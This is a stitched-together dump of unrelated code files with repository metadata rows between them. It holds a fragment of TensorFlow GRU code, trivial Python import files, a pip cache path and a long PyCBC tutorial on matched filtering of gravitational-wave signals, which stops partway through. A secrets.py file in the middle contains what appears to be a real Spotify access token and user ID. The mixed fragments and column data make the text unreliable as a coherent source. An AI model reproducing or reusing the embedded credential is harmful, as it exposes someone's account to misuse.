h_t = tf.ones((self.batch_size * self.num_sentences, self.hidden_size)) # initial hidden state, shape [batch_size*num_sentences, hidden_size]
h_t_forward_list = []
for time_step, Xt in enumerate(embedded_words_squeeze): # Xt: [batch_size*num_sentences,embed_size]
h_t = self.gru_single_step_word_level(Xt,h_t) # [batch_size*num_sentences,embed_size]<------Xt:[batch_size*num_sentences,embed_size];h_t:[batch_size*num_sentences,embed_size]
h_t_forward_list.append(h_t)
return h_t_forward_list # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# backward gru for first level: word level
def gru_backward_word_level(self, embedded_words):
"""
:param embedded_words:[batch_size*num_sentences,sentence_length,embed_size]
:return: backward hidden states: a list of length sentence_length; each element is [batch_size*num_sentences,hidden_size]
"""
# split embedded_words along the time axis
embedded_words_splitted = tf.split(embedded_words, self.sequence_length, axis=1) # a list of length sentence_length; each element is [batch_size*num_sentences,1,embed_size]
embedded_words_squeeze = [tf.squeeze(x, axis=1) for x in embedded_words_splitted] # a list of length sentence_length; each element is [batch_size*num_sentences,embed_size]
embedded_words_squeeze.reverse() # process the sequence in reverse order for the backward GRU
h_t = tf.ones((self.batch_size * self.num_sentences, self.hidden_size)) # initial hidden state
h_t_backward_list = []
for time_step, Xt in enumerate(embedded_words_squeeze):
h_t = self.gru_single_step_word_level(Xt, h_t)
h_t_backward_list.append(h_t)
h_t_backward_list.reverse() #ADD 2017.06.14
return h_t_backward_list
| 73.504528
| 271
| 0.645242
| 8,420
| 56,819
| 4.074703
| 0.051069
| 0.024134
| 0.018654
| 0.028564
| 0.815063
| 0.786324
| 0.756303
| 0.738727
| 0.721531
| 0.705791
| 0
| 0.018031
| 0.246449
| 56,819
| 773
| 272
| 73.504528
| 0.783282
| 0.361288
| 0
| 0.631579
| 0
| 0
| 0.025736
| 0.004387
| 0
| 0
| 0
| 0.001294
| 0
| 1
| 0.042105
| false
| 0
| 0.006316
| 0
| 0.090526
| 0.029474
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9a0b57f9897341dbf4f0828c83a5160880aa142b
| 45
|
py
|
Python
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 35
|
2018-01-08T01:20:16.000Z
|
2018-02-06T02:37:14.000Z
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 55
|
2018-01-03T02:42:03.000Z
|
2018-02-06T13:35:54.000Z
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 4
|
2018-01-08T13:13:14.000Z
|
2018-01-12T19:35:32.000Z
|
from .PresetsProvider import PresetsProvider
| 22.5
| 44
| 0.888889
| 4
| 45
| 10
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.97561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d00a03ae35e78c4e8b9bc89a2cfd929cd6056ff0
| 49
|
py
|
Python
|
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | null | null | null |
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | 1
|
2021-01-26T16:55:48.000Z
|
2021-09-03T15:29:14.000Z
|
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | null | null | null |
from visigoth.common.button.button import Button
| 24.5
| 48
| 0.857143
| 7
| 49
| 6
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d00a54a193ac5ebd619bfa78b01c0915f479abc6
| 50
|
py
|
Python
|
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | 3
|
2019-12-11T11:51:03.000Z
|
2021-01-22T16:30:26.000Z
|
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | null | null | null |
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | 1
|
2021-08-05T01:31:25.000Z
|
2021-08-05T01:31:25.000Z
|
from .kliep import SequentialDensityRatioEstimator
| 50
| 50
| 0.92
| 4
| 50
| 11.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 50
| 1
| 50
| 50
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d011f906abd3922116e670a592c8959ae627b819
| 367
|
py
|
Python
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 15
|
2021-08-31T13:32:12.000Z
|
2022-03-24T01:55:41.000Z
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 2
|
2022-01-13T12:53:29.000Z
|
2022-03-31T08:14:42.000Z
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 2
|
2021-11-08T16:27:16.000Z
|
2021-12-08T14:24:27.000Z
|
from pytracking.libs import TensorList, TensorDict
import pytracking.libs.complex as complex
import pytracking.libs.operation as operation
import pytracking.libs.fourier as fourier
import pytracking.libs.dcf as dcf
import pytracking.libs.optimization as optimization
from pytracking.run_tracker import run_tracker
from pytracking.run_webcam import run_webcam
| 40.777778
| 52
| 0.850136
| 50
| 367
| 6.16
| 0.3
| 0.272727
| 0.324675
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111717
| 367
| 8
| 53
| 45.875
| 0.944785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d05a02ea9f45c5c36a6b68b2b6a5c8cb09897e9e
| 393
|
py
|
Python
|
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
# Make sure to fill in your spotify client_secret information
spotify_token = "BQA9rlPrf4vTVcgHe0tpH7EdWT2GXKiY0EtdkkgV0hPG0UJGCvQu-ukTCF8v_hA0_VaV8fx3aqhMlEieIZ0-5xN7l5HbiLt8HznvD_7F6REXUj73Nve9gZAnqg6rhPuSR21Jr2ANQtL7fGXuHH5bJwwJKYM8Juh-uMpuWk4CjXCZlAwrhQJN9fUXBbbtIKZhz9VMUD12DGexkDL6dRwRBlNulG_fwXoD3d-01YDf9XA44uL5dc-LHgEodTDVE_Unm5BX4XCzixQ"
spotify_user_id = "zm8gg3wodda82w1e8ic9id3gh"
| 131
| 285
| 0.931298
| 27
| 393
| 13.222222
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137566
| 0.038168
| 393
| 3
| 286
| 131
| 0.806878
| 0.150127
| 0
| 0
| 0
| 0
| 0.876877
| 0.876877
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d06e3c2cf8d7ceaba559d73d5da1d8636e04b4a3
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/69/03/97/70acedcc1cc884136e11b4af68d67ec6d0c446f896ca74736d25697acc
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 0
| 96
| 1
| 96
| 96
| 0.479167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d086ea8671a807079a01e32a806a3b8e28bfffbe
| 245
|
py
|
Python
|
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
# apiPackage asposeslidescloud.apis
# apiPackage
from asposeslidescloud.apis.api_base import ApiBase
from asposeslidescloud.apis.slides_api import SlidesApi
| 24.5
| 55
| 0.840816
| 30
| 245
| 6.633333
| 0.533333
| 0.316583
| 0.251256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00463
| 0.118367
| 245
| 9
| 56
| 27.222222
| 0.916667
| 0.35102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d0a5c6f477a74ce5ed493ee391e12ea2abfd2296
| 99
|
py
|
Python
|
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
from streamlit_webrtc import webrtc_streamer
webrtc_streamer(key="Example")
| 24.75
| 44
| 0.858586
| 14
| 99
| 5.857143
| 0.642857
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 99
| 4
| 45
| 24.75
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0.07
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
efb73241f4180046c16555e969c5d8d2c2ec1375
| 45
|
py
|
Python
|
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | null | null | null |
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | 13
|
2020-06-05T18:26:43.000Z
|
2021-06-10T20:36:13.000Z
|
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | null | null | null |
from .financial_transaction_manager import *
| 22.5
| 44
| 0.866667
| 5
| 45
| 7.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4bc9791eafce244dc6008ef33fee14fce8df5e10
| 26
|
py
|
Python
|
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
print "Hi from test child"
| 26
| 26
| 0.769231
| 5
| 26
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
ef03b2e34b514fcb5ee1594d1de7b41a2ec080d9
| 30,897
|
py
|
Python
|
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# ## Tutorial 2.1 PyCBC Tutorial, An introduction to matched-filtering
#
# We will be using the [PyCBC](http://github.com/ligo-cbc/pycbc) library, which is used to study gravitational-wave data, find astrophysical sources due to compact binary mergers, and study their parameters. These are some of the same tools that the LIGO and Virgo collaborations use to find gravitational waves in LIGO/Virgo data
#
# In this tutorial we will walk through how to find a specific signal in LIGO data. We present matched filtering as a cross-correlation, in both the time domain and the frequency domain. In the next tutorial (2.2), we use the method as encoded in PyCBC, which is optimal in the case of Gaussian noise and a known signal model. In reality our noise is not entirely Gaussian, and in practice we use a variety of techniques to separate signals from noise in addition to the use of the matched filter.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2020/blob/master/Day_2/Tuto_2.1_Matched_filtering_introduction.ipynb)
#
# Additional [examples](http://pycbc.org/pycbc/latest/html/#library-examples-and-interactive-tutorials) and module level documentation are [here](http://pycbc.org/pycbc/latest/html/py-modindex.html)
# ## Installation (un-comment and execute only if running on a cloud platform!)
# In[1]:
# -- Use the following for Google Colab
#! pip install -q 'lalsuite==6.66' 'PyCBC==1.15.3'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ### Matched-filtering: Finding well modelled signals in Gaussian noise
#
# Matched filtering can be shown to be the optimal method for "detecting" signals---when the signal waveform is known---in Gaussian noise. We'll explore those assumptions a little later, but for now let's demonstrate how this works.
#
# Let's assume you have a stretch of noise, white noise to start:
# In[162]:
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy
import pylab
# specify the sample rate.
# LIGO raw data is sampled at 16384 Hz (=2^14 samples/second).
# It captures signal frequency content up to f_Nyquist = 8192 Hz.
# Here, we will make the computation faster by sampling at a lower rate.
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
# And then let's add a gravitational wave signal to some random part of this data.
# In[163]:
from pycbc.waveform import get_td_waveform
# the "approximant" (jargon for parameterized waveform family).
# IMRPhenomD is defined in the frequency domain, but we'll get it in the time domain (td).
# It runs fast, but it doesn't include effects such as non-aligned component spin, or higher order modes.
apx = 'IMRPhenomD'
# You can specify many parameters,
# https://pycbc.org/pycbc/latest/html/pycbc.waveform.html?highlight=get_td_waveform#pycbc.waveform.waveform.get_td_waveform
# but here, we'll use defaults for everything except the masses.
# It returns both hplus and hcross, but we'll only use hplus for now.
hp1, _ = get_td_waveform(approximant=apx,
mass1=10,
mass2=10,
delta_t=1.0/sample_rate,
f_lower=25)
# The amplitude of gravitational-wave signals is normally of order 1E-20. To demonstrate our method
# on white noise with amplitude O(1) we normalize our signal so the cross-correlation of the signal with
# itself will give a value of 1. In this case we can interpret the cross-correlation of the signal with white
# noise as a signal-to-noise ratio.
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# note that in this figure, the waveform amplitude is of order 1.
# The duration (for frequency above f_lower=25 Hz) is only 3 or 4 seconds long.
# The waveform is "tapered": slowly ramped up from zero to full strength, over the first second or so.
# It is zero-padded at earlier times.
pylab.figure()
pylab.title("The waveform hp1")
pylab.plot(hp1.sample_times, hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
pylab.figure()
pylab.title("Looks like random noise, right?")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
pylab.figure()
pylab.title("Signal in the data")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.plot(hp1.sample_times, 10 * hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# To search for this signal we can cross-correlate the signal with the entire dataset (not in any way optimized at this point; we are just showing the method).
#
# We will do the cross-correlation in the time domain, once for each time step. It runs slowly...
# In[164]:
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
# plot the cross-correlated data vs time. Superimpose the location of the end of the signal;
# this is where we should find a peak in the cross-correlation.
pylab.figure()
times = numpy.arange(len(data) - len(hp1_numpy)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)], [-10,10],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# Here you can see that the largest spike from the cross-correlation comes at the time of the signal. We only really need one more ingredient to describe matched-filtering: "Colored" noise (Gaussian noise but with a frequency-dependent variance; white noise has frequency-independent variance).
#
# Let's repeat the process, but generate a stretch of data colored with LIGO's zero-detuned--high-power noise curve. We'll use a PyCBC library to do this.
# In[165]:
# http://pycbc.org/pycbc/latest/html/noise.html
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# plot it:
pylab.loglog(estimated_psd.sample_frequencies, estimated_psd, label='estimate')
pylab.loglog(psd.sample_frequencies, psd, linewidth=3, label='known psd')
pylab.xlim(xmin=flow, xmax=512)
pylab.ylim(1e-47, 1e-45)
pylab.legend()
pylab.grid()
pylab.show()
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Then all we need to do is to "whiten" both the data, and the template waveform. This can be done, in the frequency domain, by dividing by the PSD. This *can* be done in the time domain as well, but it's more intuitive in the frequency domain
# In[166]:
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
# In[167]:
# Now let's re-do the correlation, in the time domain, but with whitened data and template.
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# # Challenge!
#
# * Histogram the whitened time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation? (We have not been careful in normalizing the whitened data properly).
# * Histogram the above cross-correlation time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation?
# * Find the location of the peak. (Note that here, it can be positive or negative), and the value of the SNR of the signal (which is the absolute value of the peak value, divided by the standard deviation of the cross-correlation time series).
#
# ## Optional challenge question (much harder):
# * Repeat this process, but instead of using a waveform with mass1=mass2=10, try 15, 20, or 25. Plot the SNR vs mass. Careful! Using lower masses (eg, mass1=mass2=1.4 Msun) will not work here. Why?
# In[168]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# ###### Yes, the histogram of the whitened data is approximately Gaussian
# In[169]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
# SNR = |peak of the cross-correlation| / std of the cross-correlation time series (not the histogram peak)
SNR_10 = np.abs(cross_correlation).max()/std
print('The SNR_10 value is',SNR_10)
#print(bin_nmax)
# ### For mass1=mass2=15
# In[170]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
